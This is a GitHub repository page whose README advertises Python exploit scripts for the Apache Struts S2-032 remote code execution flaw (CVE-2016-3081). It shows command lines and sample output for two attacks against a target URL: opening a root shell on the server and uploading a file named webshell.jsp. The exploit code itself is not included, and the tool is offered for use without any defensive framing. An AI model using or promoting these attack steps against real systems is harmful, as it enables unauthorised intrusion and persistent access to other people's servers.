PyEXP

The EXP coding by python,and I'll publish the popular EXP here.

##s2-032_cmd.py

USG:
python s2-032_cmd.py http://x.y.z/*.action
use '\q' to exit the shell

##s2-032_all.py

usage: s2-032_all.py [-h] [--cmd] [--url URL] [-f FILENAME] [-d SHELLNAME]

CVE-2016-3081 | Apache Struts S2-032

optional arguments: -h, --help show this help message and exit
--cmd drop into shell-like RCE
--url URL specifiy the url of the target
-f FILENAME specifiy loacl filename of the file you want to upload
-d SHELLNAME specifiy remote filename upload on the server

use it like this:
python s2-032_all.py --cmd --url http://localhost/hello.action
# whoami
root
# \q
Bye!

python s2-032_all.py -f wanger.txt -d webshell.jsp --url http://localhost/hello.action
File upload success!
http://localhost/webshell.jsp

Name		Name	Last commit message	Last commit date
Latest commit History 13 Commits
README.md		README.md
s2-032_all.py		s2-032_all.py
s2-032_cmd.py		s2-032_cmd.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

s2-032_all.py

s2-032_all.py

s2-032_cmd.py

s2-032_cmd.py

Repository files navigation

PyEXP

About

Releases

Packages

Languages

jooeji/PyEXP

Folders and files

Latest commit

History

Repository files navigation

PyEXP

About

Resources

Stars

Watchers

Forks

Languages